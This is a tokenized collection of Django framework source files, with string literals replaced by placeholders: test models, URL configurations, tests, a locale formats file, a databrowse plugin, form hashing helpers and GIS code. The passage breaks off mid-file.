<s> from django . db import models <EOL> from django . contrib import admin <EOL> class Band ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> bio = models . TextField ( ) <EOL> rank = models . IntegerField ( ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> class Song ( models . Model ) : <EOL> band = models . ForeignKey ( Band ) <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> duration = models . IntegerField ( ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> class SongInlineDefaultOrdering ( admin . StackedInline ) : <EOL> model = Song <EOL> class SongInlineNewOrdering ( admin . StackedInline ) : <EOL> model = Song <EOL> ordering = ( '<STR_LIT>' , ) </s>
<s> import warnings <EOL> from django . test . utils import get_warnings_state , restore_warnings_state <EOL> from regressiontests . comment_tests . tests import CommentTestCase <EOL> class CommentFeedTests ( CommentTestCase ) : <EOL> urls = '<STR_LIT>' <EOL> feed_url = '<STR_LIT>' <EOL> def test_feed ( self ) : <EOL> response = self . client . get ( self . feed_url ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertEqual ( response [ '<STR_LIT:Content-Type>' ] , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> self . assertContains ( response , '<STR_LIT>' ) <EOL> class LegacyCommentFeedTests ( CommentFeedTests ) : <EOL> feed_url = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . _warnings_state = get_warnings_state ( ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> warnings . filterwarnings ( "<STR_LIT:ignore>" , category = DeprecationWarning , <EOL> module = '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> restore_warnings_state ( self . _warnings_state ) </s>
<s> from django . conf . urls . defaults import * <EOL> from django . views . generic import TemplateView <EOL> from django . views . decorators . cache import cache_page <EOL> import views <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , <EOL> TemplateView . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> TemplateView . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . CustomTemplateView . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> cache_page ( <NUM_LIT> ) ( TemplateView . as_view ( template_name = '<STR_LIT>' ) ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . ObjectDetail . as_view ( ) ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ArtistDetail . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( template_name_suffix = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( context_object_name = '<STR_LIT:object>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . PageDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDetail . as_view ( queryset = None ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . ArtistCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . ArtistUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorCreate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorCreate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorCreateRestricted . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . SpecializedAuthorCreate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorUpdate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorUpdate . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . OneAuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . SpecializedAuthorUpdate . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorDelete . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . NaiveAuthorDelete . as_view ( success_url = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorDelete . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . SpecializedAuthorDelete . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( template_name_suffix = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( queryset = None ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookArchive . as_view ( paginate_by = <NUM_LIT:10> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . DictList . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . DictList . as_view ( paginate_by = <NUM_LIT:1> ) ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ArtistList . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( allow_empty = False ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( template_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( template_name_suffix = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( context_object_name = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( queryset = None ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorList . as_view ( paginate_by = <NUM_LIT:5> , paginator_class = views . CustomPaginator ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . AuthorListCustomPaginator . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( make_object_list = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( make_object_list = True , paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookYearArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( month_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookMonthArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( paginate_by = <NUM_LIT:30> ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookWeekArchive . as_view ( week_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( month_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( paginate_by = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDayArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookTodayArchive . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookTodayArchive . as_view ( allow_empty = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( month_format = '<STR_LIT>' ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( allow_future = True ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , <EOL> views . BookDetail . as_view ( ) ) , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) <EOL> ) </s>
<s> import os <EOL> from django . db import models <EOL> from django . core . exceptions import ValidationError <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> class Triple ( models . Model ) : <EOL> left = models . IntegerField ( ) <EOL> middle = models . IntegerField ( ) <EOL> right = models . IntegerField ( ) <EOL> class Meta : <EOL> unique_together = ( ( '<STR_LIT:left>' , '<STR_LIT>' ) , ( u'<STR_LIT>' , u'<STR_LIT:right>' ) ) <EOL> class FilePathModel ( models . Model ) : <EOL> path = models . FilePathField ( path = os . path . dirname ( __file__ ) , match = "<STR_LIT>" , blank = True ) <EOL> class Publication ( models . Model ) : <EOL> title = models . CharField ( max_length = <NUM_LIT:30> ) <EOL> date_published = models . DateField ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . title <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> publications = models . ManyToManyField ( Publication ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline <EOL> class CustomFileField ( models . FileField ) : <EOL> def save_form_data ( self , instance , data ) : <EOL> been_here = getattr ( self , '<STR_LIT>' , False ) <EOL> assert not been_here , "<STR_LIT>" <EOL> setattr ( self , '<STR_LIT>' , True ) <EOL> class CustomFF ( models . Model ) : <EOL> f = CustomFileField ( upload_to = '<STR_LIT>' , blank = True ) <EOL> class RealPerson ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> def clean ( self ) : <EOL> if self . name . lower ( ) == '<STR_LIT>' : <EOL> raise ValidationError ( "<STR_LIT>" ) <EOL> class Author ( models . Model ) : <EOL> publication = models . OneToOneField ( Publication , null = True , blank = True ) <EOL> full_name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class Author1 ( models . Model ) : <EOL> publication = models . OneToOneField ( Publication , null = False ) <EOL> full_name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class Homepage ( models . Model ) : <EOL> url = models . URLField ( verify_exists = False ) <EOL> class Document ( models . Model ) : <EOL> myfile = models . FileField ( upload_to = '<STR_LIT>' , blank = True ) <EOL> class Edition ( models . Model ) : <EOL> author = models . ForeignKey ( Person ) <EOL> publication = models . ForeignKey ( Publication ) <EOL> edition = models . IntegerField ( ) <EOL> isbn = models . CharField ( max_length = <NUM_LIT> , unique = True ) <EOL> class Meta : <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ) </s>
<s> from django . http import HttpResponse <EOL> from django . utils . decorators import decorator_from_middleware <EOL> from django . views . generic import View <EOL> from django . middleware . doc import XViewMiddleware <EOL> xview_dec = decorator_from_middleware ( XViewMiddleware ) <EOL> def xview ( request ) : <EOL> return HttpResponse ( ) <EOL> class XViewClass ( View ) : <EOL> def get ( request ) : <EOL> return HttpResponse ( ) </s>
<s> from django . conf . urls . defaults import patterns <EOL> import views <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , views . get_person ) , <EOL> ) </s>
<s> from debug import * <EOL> from defaults import * <EOL> from generic . create_update import * <EOL> from generic . date_based import * <EOL> from generic . object_list import * <EOL> from generic . simple import * <EOL> from i18n import * <EOL> from shortcuts import * <EOL> from specials import * <EOL> from static import * </s>
<s> DATE_FORMAT = '<STR_LIT>' <EOL> TIME_FORMAT = '<STR_LIT>' <EOL> DATETIME_FORMAT = '<STR_LIT>' <EOL> YEAR_MONTH_FORMAT = '<STR_LIT>' <EOL> MONTH_DAY_FORMAT = '<STR_LIT>' <EOL> SHORT_DATE_FORMAT = '<STR_LIT>' <EOL> SHORT_DATETIME_FORMAT = '<STR_LIT>' <EOL> FIRST_DAY_OF_WEEK = <NUM_LIT:1> <EOL> DATE_INPUT_FORMATS = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ) <EOL> TIME_INPUT_FORMATS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> DATETIME_INPUT_FORMATS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> DECIMAL_SEPARATOR = '<STR_LIT:U+002C>' <EOL> THOUSAND_SEPARATOR = '<STR_LIT:.>' <EOL> NUMBER_GROUPING = <NUM_LIT:3> </s>
<s> import warnings <EOL> from django . template import Library <EOL> from django . templatetags . static import PrefixNode <EOL> register = Library ( ) <EOL> @ register . simple_tag <EOL> def admin_media_prefix ( ) : <EOL> """<STR_LIT>""" <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , PendingDeprecationWarning ) <EOL> return PrefixNode . handle_simple ( "<STR_LIT>" ) </s>
<s> import os <EOL> from django . conf import global_settings <EOL> from django . contrib . auth import authenticate <EOL> from django . contrib . auth . context_processors import PermWrapper , PermLookupDict <EOL> from django . db . models import Q <EOL> from django . template import context <EOL> from django . test import TestCase <EOL> from django . test . utils import override_settings <EOL> class MockUser ( object ) : <EOL> def has_module_perm ( self , perm ) : <EOL> if perm == '<STR_LIT>' : <EOL> return True <EOL> return False <EOL> def has_perm ( self , perm ) : <EOL> if perm == '<STR_LIT>' : <EOL> return True <EOL> return False <EOL> class PermWrapperTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> class EQLimiterObject ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . eq_calls = <NUM_LIT:0> <EOL> def __eq__ ( self , other ) : <EOL> if self . eq_calls > <NUM_LIT:0> : <EOL> return True <EOL> self . eq_calls += <NUM_LIT:1> <EOL> return False <EOL> def test_permwrapper_in ( self ) : <EOL> """<STR_LIT>""" <EOL> perms = PermWrapper ( MockUser ( ) ) <EOL> def raises ( ) : <EOL> self . EQLimiterObject ( ) in perms <EOL> self . assertRaises ( raises , TypeError ) <EOL> def test_permlookupdict_in ( self ) : <EOL> pldict = PermLookupDict ( MockUser ( ) , '<STR_LIT>' ) <EOL> def raises ( ) : <EOL> self . EQLimiterObject ( ) in pldict <EOL> self . assertRaises ( raises , TypeError ) <EOL> class AuthContextProcessorTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> urls = '<STR_LIT>' <EOL> fixtures = [ '<STR_LIT>' ] <EOL> @ override_settings ( <EOL> MIDDLEWARE_CLASSES = global_settings . MIDDLEWARE_CLASSES , <EOL> TEMPLATE_CONTEXT_PROCESSORS = global_settings . TEMPLATE_CONTEXT_PROCESSORS , <EOL> ) <EOL> def test_session_not_accessed ( self ) : <EOL> """<STR_LIT>""" <EOL> context . _standard_context_processors = None <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> context . _standard_context_processors = None <EOL> @ override_settings ( <EOL> MIDDLEWARE_CLASSES = global_settings . MIDDLEWARE_CLASSES , <EOL> TEMPLATE_CONTEXT_PROCESSORS = global_settings . TEMPLATE_CONTEXT_PROCESSORS , <EOL> ) <EOL> def test_session_is_accessed ( self ) : <EOL> """<STR_LIT>""" <EOL> context . _standard_context_processors = None <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> context . _standard_context_processors = None <EOL> def test_perms_attrs ( self ) : <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_message_attrs ( self ) : <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> def test_user_attrs ( self ) : <EOL> """<STR_LIT>""" <EOL> self . client . login ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> user = authenticate ( username = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> self . assertContains ( response , "<STR_LIT>" ) <EOL> query = Q ( user = response . context [ '<STR_LIT:user>' ] ) & Q ( someflag = True ) <EOL> self . assertEqual ( response . context [ '<STR_LIT:user>' ] , user ) <EOL> self . assertEqual ( user , response . context [ '<STR_LIT:user>' ] ) <EOL> AuthContextProcessorTests = override_settings ( <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) , <EOL> ) , <EOL> USE_TZ = False , <EOL> ) ( AuthContextProcessorTests ) </s>
<s> from django import http <EOL> from django . db import models <EOL> from django . contrib . databrowse . datastructures import EasyModel <EOL> from django . contrib . databrowse . sites import DatabrowsePlugin <EOL> from django . shortcuts import render_to_response <EOL> from django . utils . text import capfirst <EOL> from django . utils . encoding import force_unicode <EOL> from django . utils . safestring import mark_safe <EOL> from django . views . generic import dates <EOL> from django . utils import datetime_safe <EOL> class DateViewMixin ( object ) : <EOL> allow_empty = False <EOL> allow_future = True <EOL> root_url = None <EOL> model = None <EOL> field = None <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( DateViewMixin , self ) . get_context_data ( ** kwargs ) <EOL> context . update ( { <EOL> '<STR_LIT>' : self . root_url , <EOL> '<STR_LIT>' : self . model , <EOL> '<STR_LIT>' : self . field <EOL> } ) <EOL> return context <EOL> class DayView ( DateViewMixin , dates . DayArchiveView ) : <EOL> template_name = '<STR_LIT>' <EOL> class MonthView ( DateViewMixin , dates . MonthArchiveView ) : <EOL> template_name = '<STR_LIT>' <EOL> class YearView ( DateViewMixin , dates . YearArchiveView ) : <EOL> template_name = '<STR_LIT>' <EOL> class IndexView ( DateViewMixin , dates . ArchiveIndexView ) : <EOL> template_name = '<STR_LIT>' <EOL> class CalendarPlugin ( DatabrowsePlugin ) : <EOL> def __init__ ( self , field_names = None ) : <EOL> self . field_names = field_names <EOL> def field_dict ( self , model ) : <EOL> """<STR_LIT>""" <EOL> if self . field_names is None : <EOL> return dict ( [ ( f . name , f ) for f in model . _meta . fields if isinstance ( f , models . DateField ) ] ) <EOL> else : <EOL> return dict ( [ ( f . name , f ) for f in model . _meta . fields if isinstance ( f , models . DateField ) and f . name in self . field_names ] ) <EOL> def model_index_html ( self , request , model , site ) : <EOL> fields = self . field_dict ( model ) <EOL> if not fields : <EOL> return u'<STR_LIT>' <EOL> return mark_safe ( u'<STR_LIT>' % u'<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( f . name , force_unicode ( capfirst ( f . verbose_name ) ) ) for f in fields . values ( ) ] ) ) <EOL> def urls ( self , plugin_name , easy_instance_field ) : <EOL> if isinstance ( easy_instance_field . field , models . DateField ) : <EOL> d = easy_instance_field . raw_value <EOL> return [ mark_safe ( u'<STR_LIT>' % ( <EOL> easy_instance_field . model . url ( ) , <EOL> plugin_name , easy_instance_field . field . name , <EOL> str ( d . year ) , <EOL> datetime_safe . new_date ( d ) . strftime ( '<STR_LIT>' ) . lower ( ) , <EOL> d . day ) ) ] <EOL> def model_view ( self , request , model_databrowse , url ) : <EOL> self . model , self . site = model_databrowse . model , model_databrowse . site <EOL> self . fields = self . field_dict ( self . model ) <EOL> if not self . fields : <EOL> raise http . Http404 ( '<STR_LIT>' ) <EOL> if url is None : <EOL> return self . homepage_view ( request ) <EOL> url_bits = url . split ( '<STR_LIT:/>' ) <EOL> if url_bits [ <NUM_LIT:0> ] in self . fields : <EOL> return self . calendar_view ( request , self . fields [ url_bits [ <NUM_LIT:0> ] ] , * url_bits [ <NUM_LIT:1> : ] ) <EOL> raise http . Http404 ( '<STR_LIT>' ) <EOL> def homepage_view ( self , request ) : <EOL> easy_model = EasyModel ( self . site , self . model ) <EOL> field_list = self . fields . values ( ) <EOL> field_list . sort ( key = lambda k : k . verbose_name ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : self . site . root_url , <EOL> '<STR_LIT>' : easy_model , <EOL> '<STR_LIT>' : field_list <EOL> } ) <EOL> def calendar_view ( self , request , field , year = None , month = None , day = None ) : <EOL> easy_model = EasyModel ( self . site , self . model ) <EOL> root_url = self . site . root_url <EOL> if day is not None : <EOL> return DayView . as_view ( <EOL> year = year , month = month , day = day , <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> elif month is not None : <EOL> return MonthView . as_view ( <EOL> year = year , month = month , <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> elif year is not None : <EOL> return YearView . as_view ( <EOL> year = year , <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> else : <EOL> return IndexView . as_view ( <EOL> date_field = field . name , <EOL> queryset = easy_model . get_query_set ( ) , <EOL> root_url = root_url , <EOL> model = easy_model , <EOL> field = field <EOL> ) ( request ) <EOL> assert False , ( '<STR_LIT>' % ( field , year , month , day ) ) </s>
<s> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> import hashlib <EOL> from django . conf import settings <EOL> from django . utils . crypto import salted_hmac <EOL> def security_hash ( request , form , * args ) : <EOL> """<STR_LIT>""" <EOL> import warnings <EOL> warnings . warn ( "<STR_LIT>" , <EOL> DeprecationWarning ) <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> data . extend ( args ) <EOL> data . append ( settings . SECRET_KEY ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> return hashlib . md5 ( pickled ) . hexdigest ( ) <EOL> def form_hmac ( form ) : <EOL> """<STR_LIT>""" <EOL> data = [ ] <EOL> for bf in form : <EOL> if form . empty_permitted and not form . has_changed ( ) : <EOL> value = bf . data or '<STR_LIT>' <EOL> else : <EOL> value = bf . field . clean ( bf . data ) or '<STR_LIT>' <EOL> if isinstance ( value , basestring ) : <EOL> value = value . strip ( ) <EOL> data . append ( ( bf . name , value ) ) <EOL> pickled = pickle . dumps ( data , pickle . HIGHEST_PROTOCOL ) <EOL> key_salt = '<STR_LIT>' <EOL> return salted_hmac ( key_salt , pickled ) . hexdigest ( ) </s>
<s> from django . db . models . sql . aggregates import * <EOL> from django . contrib . gis . db . models . fields import GeometryField <EOL> class GeoAggregate ( Aggregate ) : <EOL> sql_template = '<STR_LIT>' <EOL> conversion_class = None <EOL> is_extent = False <EOL> def __init__ ( self , col , source = None , is_summary = False , tolerance = <NUM_LIT> , ** extra ) : <EOL> super ( GeoAggregate , self ) . __init__ ( col , source , is_summary , ** extra ) <EOL> self . tolerance = tolerance <EOL> if not isinstance ( self . source , GeometryField ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def as_sql ( self , qn , connection ) : <EOL> "<STR_LIT>" <EOL> if connection . ops . oracle : <EOL> self . extra [ '<STR_LIT>' ] = self . tolerance <EOL> if hasattr ( self . col , '<STR_LIT>' ) : <EOL> field_name = self . col . as_sql ( qn , connection ) <EOL> elif isinstance ( self . col , ( list , tuple ) ) : <EOL> field_name = '<STR_LIT:.>' . join ( [ qn ( c ) for c in self . col ] ) <EOL> else : <EOL> field_name = self . col <EOL> sql_template , sql_function = connection . ops . spatial_aggregate_sql ( self ) <EOL> params = { <EOL> '<STR_LIT>' : sql_function , <EOL> '<STR_LIT>' : field_name <EOL> } <EOL> params . update ( self . extra ) <EOL> return sql_template % params <EOL> class Collect ( GeoAggregate ) : <EOL> pass <EOL> class Extent ( GeoAggregate ) : <EOL> is_extent = '<STR_LIT>' <EOL> class Extent3D ( GeoAggregate ) : <EOL> is_extent = '<STR_LIT>' <EOL> class MakeLine ( GeoAggregate ) : <EOL> pass <EOL> class Union ( GeoAggregate ) : <EOL> pass </s>
<s> from ctypes import c_char_p , c_int , c_size_t , c_ubyte , POINTER <EOL> from django . contrib . gis . geos . libgeos import CS_PTR , GEOM_PTR <EOL> from django . contrib . gis . geos . prototypes . errcheck import ( <EOL> check_geom , check_minus_one , check_sized_string , check_string , check_zero ) <EOL> from django . contrib . gis . geos . prototypes . threadsafe import GEOSFunc <EOL> c_uchar_p = POINTER ( c_ubyte ) <EOL> class geos_char_p ( c_char_p ) : <EOL> pass <EOL> def bin_constructor ( func ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ c_char_p , c_size_t ] <EOL> func . restype = GEOM_PTR <EOL> func . errcheck = check_geom <EOL> return func <EOL> def bin_output ( func ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ GEOM_PTR , POINTER ( c_size_t ) ] <EOL> func . errcheck = check_sized_string <EOL> func . restype = c_uchar_p <EOL> return func <EOL> def geom_output ( func , argtypes ) : <EOL> "<STR_LIT>" <EOL> if argtypes : func . argtypes = argtypes <EOL> func . restype = GEOM_PTR <EOL> func . errcheck = check_geom <EOL> return func <EOL> def geom_index ( func ) : <EOL> "<STR_LIT>" <EOL> return geom_output ( func , [ GEOM_PTR , c_int ] ) <EOL> def int_from_geom ( func , zero = False ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ GEOM_PTR ] <EOL> func . restype = c_int <EOL> if zero : <EOL> func . errcheck = check_zero <EOL> else : <EOL> func . errcheck = check_minus_one <EOL> return func <EOL> def string_from_geom ( func ) : <EOL> "<STR_LIT>" <EOL> func . argtypes = [ GEOM_PTR ] <EOL> func . restype = geos_char_p <EOL> func . errcheck = check_string <EOL> return func <EOL> from_hex = bin_constructor ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> from_wkb = bin_constructor ( GEOSFunc ( '<STR_LIT>' ) ) <EOL> from_wkt = geom_output ( GEOSFunc ( 